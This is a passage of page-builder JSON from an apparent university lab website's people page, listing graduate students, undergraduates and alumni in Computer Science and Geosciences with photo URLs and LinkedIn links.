Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 